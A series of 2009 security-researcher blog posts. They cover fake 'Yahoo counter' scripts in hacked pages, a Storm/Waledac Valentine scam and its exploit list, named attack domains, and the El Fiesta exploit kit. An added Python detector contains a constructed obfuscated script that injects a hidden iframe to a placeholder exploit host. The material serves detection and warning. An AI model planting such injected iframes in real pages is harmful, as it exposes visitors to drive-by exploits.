Wednesday, February 25, 2009

It's _not_ a Yahoo counter!

One of the most common complaints we get is when a webmeister or user thinks we're unjustly accusing a website of being evil, and, without sounding immodest about it, we're usually right. The way LinkScanner works is that it makes its evaluations in real time ... it looks at the code as it comes off the webpage, and decides if things are dangerous or not. That's as opposed to those systems that rely on a central database, which is usually too slow to realize that something is dirty, and then too slow to realize it's been cleaned up.


A typical example is the fake Yahoo counter that looks like this ...



That's the source of a typically hacked page. You see the bit about "Yahoo counter starts"? Guess what... it's _lying_! It actually decrypts to an iframe link to an exploit site, but you wouldn't believe the number of conversations I've had that go like this...

Ring, ring... me, "Hello, could I speak to your webmeister please?"
Shuffle, shuffle, switching thru ... webmeister, "Hello?"
me, "Hi, I'm sorry to have to tell you this, but I'm a security researcher, and I have to tell you that your website has been hacked."
webmeister, "Sorry... what ... who is this?"

and then we have many chats about who I am, and how I know, and eventually it gets to the point where they say "Show me", so I show them the code on their page, and they say "But it's a Yahoo counter!"
and I say "Did you put it in?", and they say, "Well, no, but one of the other guys must have"

:-)

Sometimes they believe me, but mostly they don't.

Here's the bottom line folks. I have yet to see a genuine Yahoo counter. They may exist, but they sure don't look like that, so if you're a webmeister with code like that in your pages, please delete it. Unless you put it there, it's fake.
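As an added example (not LinkScanner's code, nor anything from the original post): a small Python checker a webmaster could run over their own pages to spot this pattern. Since the hacked-page source isn't reproduced here, it assumes the common `unescape('%XX...')` obfuscation; the sample HTML and the `exploit.example` host are constructed, and no JavaScript is executed.

```python
import re
from urllib.parse import unquote

# Constructed sample: a "Yahoo counter" comment wrapping an obfuscated script,
# followed by a genuinely harmless counter. exploit.example is a placeholder host.
SAMPLE_HTML = """<html><body>
<p>Welcome to our site</p>
<!-- Yahoo counter starts -->
<script type="text/javascript">
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.example%2Fin.cgi%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'));
</script>
<!-- Yahoo counter ends -->
<script>var visits = 42; document.write("Visitors: " + visits);</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# Assumed obfuscation form: unescape('%3C...'); the real sample is not shown on the page.
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", re.I)
IFRAME_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def decode_unescape(script: str) -> str:
    """Statically decode every unescape('%XX...') payload; nothing is evaluated.
    Handles the %XX form only; JavaScript's %uXXXX form is left untouched."""
    return "".join(unquote(payload) for payload in UNESCAPE_RE.findall(script))


def find_fake_counters(html: str) -> list[dict]:
    """Flag scripts labelled as a Yahoo counter whose decoded payload is an iframe."""
    findings = []
    for match in SCRIPT_RE.finditer(html):
        # The "counter" label usually sits in an HTML comment just before the script,
        # so look at a little context ahead of the script tag as well as its body.
        context = html[max(0, match.start() - 200):match.end()].lower()
        if "yahoo counter" not in context:
            continue
        iframe = IFRAME_RE.search(decode_unescape(match.group(1)))
        if iframe:
            findings.append({"label": "Yahoo counter", "iframe_src": iframe.group(1),
                             "offset": match.start()})
    return findings


if __name__ == "__main__":
    for f in find_fake_counters(SAMPLE_HTML):
        print(f"fake counter at byte {f['offset']}: hidden iframe to {f['iframe_src']}")
```

The harmless second script carries the same "counter" label but decodes to nothing, so only the injected one is reported.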

Keep safe

Roger

Btw, to be notified of blog updates, plus little extra bits that don't make it to the blog, please follow me on twitter

Sunday, February 22, 2009

Off-topic (but I think it's a neat story)

Hi folks, this is completely off-topic, but I've been chewing on this for a few days, and feel I should share it...

A few days ago, I took three of my little girls to ballet, and in the middle of the class, the tornado sirens went off. The teachers got all the kids into the safest place in the building which was a hallway, and got them to sit down... all by the book.

Then the neat part happened...

One end of the hall was sort of open, and faced the windows .... obviously the most dangerous thing if a tornado did hit. Without anyone saying anything, the moms who were waiting for the kids sat between the kids and the windows, and the two dads (me and another guy) interposed ourselves between the moms and the windows, thus taking the most dangerous spot. No one said anything, or talked about it ... it just all happened naturally.

The parents stayed calm, and the kids stayed calm, and the tornadoes went south of us, so they went back to ballet, and the parents went back to chatting aimlessly.

About an hour later, I thought about what had happened, and realized that something nice had occurred. A bunch of strangers had naturally come together, without anyone saying anything, with the adults protecting the kids, and the men protecting the women.

In these days of terrible economic uncertainty, I found it heart warming to find that the natural inclination of a group of strangers was to protect the weaker ones.

We can, and will, pull thru this, folks.

Cheers

Roger

Thursday, February 19, 2009

I didn't say that, I _promise_

Ok, I'll admit it ... I google-alert my name. It's not as bad as it sounds, because I google alert lots of things. It's surprising to see how many people are named Roger Thompson, and it's even mildly amusing to see some of their professions, but that's a story for another day. Today, however, I got this alert...


"Even in spite of this it was a relatively benign episode as worms bearing of walking, Grey Goo is cost note, as it may be only the best ancient of this brand of malware for the future, warn Roger Thompson, CTO of anti-exploit software ..."

Now, I do like the occasional glass of shiraz, but I'm fairly confident that, even after a whole bottle of shiraz, I never said that. Heck, I can't even parse it.

It was in a blog whose identity shall remain private to protect the innocent (which may be all of us in this case), and a quick bit of searching found a second blog that opens with this amazing statement...

"A exotic resistant decisive against protecting computer user and business antagonistic zero-day attack aware to that occurrence exploit belt users' frozen drive launch a interview variation of its opening goods on Monday." This, too, came from an interview attributed to me.

Although it was posted today, it was under a heading of "Antispyware pros launch SocketShield beta", which gives a bit of a clue, because that happened in early 2006, but I'm pretty sure I never said that either.

In fact, both blogs were full of incomprehensible and un-parsable English just like that. It looks like someone is picking up old articles, translating them to non-English, and then back again... twice or more.

But the question is ... why bother? And my answer is ... I have no clue! What's the point? The blogs don't appear to be malicious as far as I and my software can determine, but who knows what might happen in the future?

As funny as the entries are, I think the best idea is simply to regard them as potentially dangerous, and stay away. In other words, if you are googling for _anything_ and the summary that comes up on the search page doesn't make sense.... treat it like a crazy looking stray dog that might bite, and go to a different site.

Stay safe folks!

Roger

PS Please follow me on twitter

Tuesday, February 10, 2009

Storm is dead ... long live storm

Today I looked at a Valentine's Day eCard scam, and it was like unexpectedly bumping into an old friend...


I got this URL, yourgreatlove.com (**** DON'T GO THERE!!!!! IT MIGHT BE STILL LIVE AND DANGEROUS**** ) from the malwarebytes forum (malwarebytes.org/forums/index.php?showtopic=11109), and given that it was Valentine's Day malware, I thought I'd take a closer look, and I saw this screen...





I thought "That's Storm!... Haven't seen that for ages". Now, it might well have been around and I just haven't been paying attention, and I'm pretty sure it's what most people call the Waledac botnet, but it was fun to think "Oh, I know what you are!"

They've updated their crypto and their exploit set, but they still try to trick you into downloading something if the exploits don't get you first, and here's the current exploit list that they throw, hoping something will stick ...

Outlook Application
Vis Studio
MS Dbg Clr
Vis Studio DTE
D.Explore
Vis Studio
Microsoft Update Web Control
Outlook Data Object
Business Object Factory
MDAC
NCT Audio File
Yahoo webcam/Messenger - June 2007
Real Player - March 2008
Creative Labs - May 2008
CA List Ctrl
Yahoo webcam - June 2007
Kingsoft update ocx - Apr 2008
MySpace uploader ocx - Feb 2008
WebEx mtg manager - Aug 2008

Of course, if they nail you, you become part of the botnet, as well as giving up your identity and bank account.

Anyway, it was a deja vu moment. These guys show a pretty fair understanding of current events, and US holidays, so the next thing we'll probably see is an Easter version, unless something newsworthy happens... disaster photos of Australian bushfires maybe?

Keep safe folks,

Roger

OFFTOPIC - REQUEST FOR HELP
Folks,
My wife and son have managed to get a song in the final 15 for the annual NSAI Country Music Television awards. This is out of several thousand entries. They have two chances to win. The first is the judged portion, which is conducted by CMT.com themselves, but the second is a public vote. It's a big opportunity for them.

Their song is "I found everything" by Kate and Ben Thompson, and you can vote for them (as often as you'd like) at http://nsai.cmt.com . I've resisted the temptation to enlist a botnet :-) but would like to help them win.

Please consider voting for them, and please ask five of your friends to.

:-)

Thanks in advance

Roger

Thursday, February 5, 2009

Guess what should be blocked next? :-)

*** Warning! DON'T go to any of these sites***

One of the longer-lived attack sites is thedeadpit. This first graphic shows the attack profile, showing a peak of about 1500 hits per day. (You can click any of the images for a larger view)




And then, after a while we started seeing the same stuff come from internetcountercheck. The attack profile shows a recent peak of about 4000 hits in one day. This is kind of interesting, and probably reflects a marketing push on their part.




It turns out that there are five domains on their domain name server, and look ... today the third one is starting too :-) ...





and here are the rest of the domains on the domain server...




So, as you can see, it's a case of three down, two to go. If anyone likes to block URLs, these would be a couple of good ones to add.

Cheers

Roger

Monday, February 2, 2009

Firefox /El Fiesta mystery solved... well, sort of

One of the most common attack kits (that we see and block every day) is El Fiesta. It is frequently updated, and according to reports, pretty cheap.... generally a fair formula for success in any part of the software biz. It has a neat statistics page that keeps nice stats like which countries it has seen, and how many successes (or loads) it has managed in each country.



It also tracks the browsers it has seen, and tracks its successes against each browser. At the bottom of the statistics page, it shows how well it has done with each exploit.



The first interesting point here is that it shows 67 loads against Firefox 3.5, which is impressive, and even more interesting is that the summary shows two FF exploits ... a FF NS Local, and a FF Behavior.

This led us to wonder what they might be, and in particular, just what was the FF Behavior trick?

At first, all we could get it to do was to throw fairly common PDF exploits at Firefox, which all failed, but then, after certain components were updated just right, we suddenly got this screen that wants to update the page....




Now, if you click ok for the update, and then run the update, you get this old friend ...



Gosh, you've got spyware.... whoda thunk it? Now, I'm not saying it's a great trick or anything, but as the stats page shows, it works. Remember, these guys don't want to cut down the apple tree... they just want to shake it, and pick up the apples that fall off.

We'll keep trying to figure out exactly how they're doing it, just for grins, but there are two other mysteries that we stumbled across while trying to solve this one, so we'll see what happens.

Cheers

Roger